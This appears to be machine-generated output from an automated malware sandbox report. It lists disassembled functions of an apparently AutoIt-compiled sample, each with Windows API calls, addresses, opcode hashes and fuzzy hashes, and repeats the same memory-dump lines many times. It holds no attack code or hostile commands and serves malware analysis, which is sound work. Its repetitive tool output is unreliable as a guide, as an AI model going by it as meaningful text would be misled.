                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 2267087916-0
                                                                            • Opcode ID: 3f2ab19ff19f953b337a3adac7059f4861b51a091d562649ec8a84076441d6b1
                                                                            • Instruction ID: 802f4622443a5caaa06a73176d5c1cc44db1f3e11ada6d5cd390f9fa2a7bdfa5
                                                                            • Opcode Fuzzy Hash: 3f2ab19ff19f953b337a3adac7059f4861b51a091d562649ec8a84076441d6b1
                                                                            • Instruction Fuzzy Hash: 5E21B1305086118FC300EF28D88186BBBE4FE55368F144A2DF4A9C72E2D7319A06DB52
                                                                            APIs
                                                                              • Part of subcall function 0085F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0085DCD3,?,?,?,0085EAC6,00000000,000000EF,00000119,?,?), ref: 0085F0CB
                                                                              • Part of subcall function 0085F0BC: lstrcpyW.KERNEL32(00000000,?,?,0085DCD3,?,?,?,0085EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0085F0F1
                                                                              • Part of subcall function 0085F0BC: lstrcmpiW.KERNEL32(00000000,?,0085DCD3,?,?,?,0085EAC6,00000000,000000EF,00000119,?,?), ref: 0085F122
                                                                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0085EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0085DCEC
                                                                            • lstrcpyW.KERNEL32(00000000,?,?,0085EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0085DD12
                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,0085EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0085DD46
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                            • String ID: cdecl
                                                                            • API String ID: 4031866154-3896280584
                                                                            • Opcode ID: f9d6364969c4c9abef5efcd8204cd3d05e271b978f29bf1340456e38e12ca1fb
                                                                            • Instruction ID: 52bb0fa49e26d874c5f1e20fcc2dc98414cb04c1338c24a7d21277f94a9877c4
                                                                            • Opcode Fuzzy Hash: f9d6364969c4c9abef5efcd8204cd3d05e271b978f29bf1340456e38e12ca1fb
                                                                            • Instruction Fuzzy Hash: 4711BE3A200305EBCB25AF38D84597A77B8FF45310B40802AFD06CB2A1EB719854CBA1
                                                                            APIs
                                                                            • _free.LIBCMT ref: 00835101
                                                                              • Part of subcall function 0082571C: __FF_MSGBANNER.LIBCMT ref: 00825733
                                                                              • Part of subcall function 0082571C: __NMSG_WRITE.LIBCMT ref: 0082573A
                                                                              • Part of subcall function 0082571C: RtlAllocateHeap.NTDLL(00E10000,00000000,00000001,00000000,?,?,?,00820DD3,?), ref: 0082575F
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap_free
                                                                            • String ID:
                                                                            • API String ID: 614378929-0
                                                                            • Opcode ID: 3f375d6fc20d69fcdb610e30b69905a7f20622dca6b140fe9d0d2596657bb340
                                                                            • Instruction ID: 5d668977d05c80681048010955b901e1f0e2492333cb3bb4e336bf297d2f458f
                                                                            • Opcode Fuzzy Hash: 3f375d6fc20d69fcdb610e30b69905a7f20622dca6b140fe9d0d2596657bb340
                                                                            • Instruction Fuzzy Hash: 0811A072901A25AECF313F78BC45B5E3B98FF943A1F10492AF904DA251DE34898197D1
                                                                            APIs
                                                                              • Part of subcall function 00805A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00867896,?,?,00000000), ref: 00805A2C
                                                                              • Part of subcall function 00805A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00867896,?,?,00000000,?,?), ref: 00805A50
                                                                            • gethostbyname.WSOCK32(?,?,?), ref: 00876399
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 008763A4
                                                                            • _memmove.LIBCMT ref: 008763D1
                                                                            • inet_ntoa.WSOCK32(?), ref: 008763DC
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                            • String ID:
                                                                            • API String ID: 1504782959-0
                                                                            • Opcode ID: cb1ea2bad13f1cff5628b5d080906f754d592d94a9afa079e1b30267206a65ef
                                                                            • Instruction ID: 7487efab706f91f2545003d562307622a84f98f96326d031b2b2d5f0b4458610
                                                                            • Opcode Fuzzy Hash: cb1ea2bad13f1cff5628b5d080906f754d592d94a9afa079e1b30267206a65ef
                                                                            • Instruction Fuzzy Hash: D8112175500109AFCB04FBA8DD46CAE77B8FF04310B148065F505E72A2DB30DE54DB62
                                                                            APIs
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00858B61
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00858B73
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00858B89
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00858BA4
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 423cb7b883e04cd76d4539cefe97fe002ab8180c89bbea27509f5f5bf10b14c4
                                                                            • Instruction ID: d5c0f017cbf9a8a97214d8953ab00913c96c729586b6c843adcafb7e1355e09f
                                                                            • Opcode Fuzzy Hash: 423cb7b883e04cd76d4539cefe97fe002ab8180c89bbea27509f5f5bf10b14c4
                                                                            • Instruction Fuzzy Hash: EC112E79901218FFDB11DF95CC85FADBB78FB48710F204196EA00B7250DA716E15DB94
                                                                            APIs
                                                                              • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                                            • DefDlgProcW.USER32(?,00000020,?), ref: 008012D8
                                                                            • GetClientRect.USER32(?,?), ref: 0083B5FB
                                                                            • GetCursorPos.USER32(?), ref: 0083B605
                                                                            • ScreenToClient.USER32(?,?), ref: 0083B610
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 4127811313-0
                                                                            • Opcode ID: 101638009501edb2849ea9c81de58c5434f0824ece03e059bf2a26eeda6d1846
                                                                            • Instruction ID: a00317985cf58332d77ee6a391be0450d080f4ad62023f72da2a810fd05d189d
                                                                            • Opcode Fuzzy Hash: 101638009501edb2849ea9c81de58c5434f0824ece03e059bf2a26eeda6d1846
                                                                            • Instruction Fuzzy Hash: D5112235A00019EFCF10EFA8DC899AE77B8FB15310F400566FA11E7281D730BA918BA6
                                                                            APIs
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0085FCED,?,00860D40,?,00008000), ref: 0086115F
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0085FCED,?,00860D40,?,00008000), ref: 00861184
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0085FCED,?,00860D40,?,00008000), ref: 0086118E
                                                                            • Sleep.KERNEL32(?,?,?,?,?,?,?,0085FCED,?,00860D40,?,00008000), ref: 008611C1
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: CounterPerformanceQuerySleep
                                                                            • String ID:
                                                                            • API String ID: 2875609808-0
                                                                            • Opcode ID: eafa4b47c81375d2f13cd5d0d376c8b4847f899c43a54ba5f678cdefd4f915f0
                                                                            • Instruction ID: d9ff1000856cd283be3ab9ac224244b768f61e23a4cd01859c4178791614aa48
                                                                            • Opcode Fuzzy Hash: eafa4b47c81375d2f13cd5d0d376c8b4847f899c43a54ba5f678cdefd4f915f0
                                                                            • Instruction Fuzzy Hash: AE114835C0052DD7CF009FA8D848AEEBB78FB0A711F064056EA40F2242CA749590CB95
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0085D84D
                                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0085D864
                                                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0085D879
                                                                            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0085D897
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                                            • String ID:
                                                                            • API String ID: 1352324309-0
                                                                            • Opcode ID: 01101c367c27e2b9edd5669aa348b270ec48564ba395744f7b8aac4eecf1a33b
                                                                            • Instruction ID: 472f86956ab71887b5f0eaaf369db32484dbe500910f6972990e7a085dd5e987
                                                                            • Opcode Fuzzy Hash: 01101c367c27e2b9edd5669aa348b270ec48564ba395744f7b8aac4eecf1a33b
                                                                            • Instruction Fuzzy Hash: C6115E75605309DBE3308F54EC08F92BBBCFB00B05F108979AE16D6051D7B0E5499BA1
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                            • String ID:
                                                                            • API String ID: 3016257755-0
                                                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                            • Instruction ID: b512b41e4082b4a4cc20c01d56e7b75367c1f3e9f98143a9abe26327f10dffa6
                                                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                            • Instruction Fuzzy Hash: 0B014EB244454EBBCF2A5E88CC51CED3F62FB58354F588415FA1898031D236C9B1ABC1
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 0088B2E4
                                                                            • ScreenToClient.USER32(?,?), ref: 0088B2FC
                                                                            • ScreenToClient.USER32(?,?), ref: 0088B320
                                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0088B33B
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                            • String ID:
                                                                            • API String ID: 357397906-0
                                                                            • Opcode ID: b8b061e71e577ec14668f2349cc17b6a2038dcf2caa6385093423318fac8c4ab
                                                                            • Instruction ID: 64003bf9624fe73c4b2d6d0ebded1030da722b0dbd9cc10c2be24de1aab6ca25
                                                                            • Opcode Fuzzy Hash: b8b061e71e577ec14668f2349cc17b6a2038dcf2caa6385093423318fac8c4ab
                                                                            • Instruction Fuzzy Hash: 931147B5D00209EFDB41DF99C4449EEBBF5FF18310F104166E914E3220D735AA558F50
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0088B644
                                                                            • _memset.LIBCMT ref: 0088B653
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,008C6F20,008C6F64), ref: 0088B682
                                                                            • CloseHandle.KERNEL32 ref: 0088B694
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$CloseCreateHandleProcess
                                                                            • String ID:
                                                                            • API String ID: 3277943733-0
                                                                            • Opcode ID: 4e8e6642fc54682df3489549b3e20d9816bddb10722afcb937772ac98a92db03
                                                                            • Instruction ID: a8ca59feffe8975a546940a71881367c222998a8e1c8fdabf7ef69363e3f362f
                                                                            • Opcode Fuzzy Hash: 4e8e6642fc54682df3489549b3e20d9816bddb10722afcb937772ac98a92db03
                                                                            • Instruction Fuzzy Hash: A4F012B25503147BE3106765BC06FBB7AACFB09795F404039FB09E5192EB759C2087A9
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 00866BE6
                                                                              • Part of subcall function 008676C4: _memset.LIBCMT ref: 008676F9
                                                                            • _memmove.LIBCMT ref: 00866C09
                                                                            • _memset.LIBCMT ref: 00866C16
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00866C26
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                            • String ID:
                                                                            • API String ID: 48991266-0
                                                                            • Opcode ID: 2891495ce41ba0a741e13bd8dfbb9240875a887225c3748df6172a92bab4a41d
                                                                            • Instruction ID: 6192b1c70f762bd0e8b4ebc28b55b2c5b4f9f404a71bd21fd92613c3469db87a
                                                                            • Opcode Fuzzy Hash: 2891495ce41ba0a741e13bd8dfbb9240875a887225c3748df6172a92bab4a41d
                                                                            • Instruction Fuzzy Hash: CEF05E3A200110BBCF016F59EC85A8ABB29FF45321F088061FE089E227D735E851CBB5
                                                                            APIs
                                                                            • GetSysColor.USER32(00000008), ref: 00802231
                                                                            • SetTextColor.GDI32(?,000000FF), ref: 0080223B
                                                                            • SetBkMode.GDI32(?,00000001), ref: 00802250
                                                                            • GetStockObject.GDI32(00000005), ref: 00802258
                                                                            • GetWindowDC.USER32(?,00000000), ref: 0083BE83
                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0083BE90
                                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 0083BEA9
                                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 0083BEC2
                                                                            • GetPixel.GDI32(00000000,?,?), ref: 0083BEE2
                                                                            • ReleaseDC.USER32(?,00000000), ref: 0083BEED
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                            • String ID:
                                                                            • API String ID: 1946975507-0
                                                                            • Opcode ID: c78bb0b69ce0bb71bc77d93a51db75514e8bafe1d1348870c50a9b9283147116
                                                                            • Instruction ID: 77a36fdf953611464867b504289c1e57c4b57368df26191eaee3bee9e7ecf743
                                                                            • Opcode Fuzzy Hash: c78bb0b69ce0bb71bc77d93a51db75514e8bafe1d1348870c50a9b9283147116
                                                                            • Instruction Fuzzy Hash: F8E06D72104244EADF225FA8FC4D7D83F10FB45332F108366FB69880E287B14990DB12
                                                                            APIs
                                                                            • GetCurrentThread.KERNEL32 ref: 0085871B
                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,008582E6), ref: 00858722
                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008582E6), ref: 0085872F
                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,008582E6), ref: 00858736
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentOpenProcessThreadToken
                                                                            • String ID:
                                                                            • API String ID: 3974789173-0
                                                                            • Opcode ID: 6049c25ce03afdeb8bab8510603cae8e8202e72a6e88359c6e31a6f503c0d559
                                                                            • Instruction ID: 7afa78c7594a68edfb7f5cf3e3ab5f687c37b2c0136d36f1fed940efc080bf1e
                                                                            • Opcode Fuzzy Hash: 6049c25ce03afdeb8bab8510603cae8e8202e72a6e88359c6e31a6f503c0d559
                                                                            • Instruction Fuzzy Hash: E6E08636611312DFD7205FF55D0CB563BACFF54792F244828B745D9051DB348445C750
                                                                            APIs
                                                                            • OleSetContainedObject.OLE32(?,00000001), ref: 0085B4BE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ContainedObject
                                                                            • String ID: AutoIt3GUI$Container
                                                                            • API String ID: 3565006973-3941886329
                                                                            • Opcode ID: 9bd215523dd7303f9d367867cda35bdebf4fe59883df8bcb5ff5bdd2f231f080
                                                                            • Instruction ID: ece737603834adc2b651873fc9d3e2fcc5c4a4c963ec16b889e90026425fc7c2
                                                                            • Opcode Fuzzy Hash: 9bd215523dd7303f9d367867cda35bdebf4fe59883df8bcb5ff5bdd2f231f080
                                                                            • Instruction Fuzzy Hash: 38915870200601AFDB24DF68C884AAABBE5FF59711F20856DED4ACB391EB70E845CB50
                                                                            APIs
                                                                              • Part of subcall function 0081FC86: _wcscpy.LIBCMT ref: 0081FCA9
                                                                              • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                                              • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                                            • __wcsnicmp.LIBCMT ref: 0086B02D
                                                                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0086B0F6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                            • String ID: LPT
                                                                            • API String ID: 3222508074-1350329615
                                                                            • Opcode ID: fea725429ef569dfab4bac86e092f8fe98b2e30b5d6724ea3608aab7ee2d581b
                                                                            • Instruction ID: 7f780b8a7b80032da2afb9e9d35bddc831c95ee9468cd312927ee3dba195aab0
                                                                            • Opcode Fuzzy Hash: fea725429ef569dfab4bac86e092f8fe98b2e30b5d6724ea3608aab7ee2d581b
                                                                            • Instruction Fuzzy Hash: 65616F75A00219AFCB14DF98C891EAEB7B4FF09314F118069F956EB391E770AE84CB51
                                                                            APIs
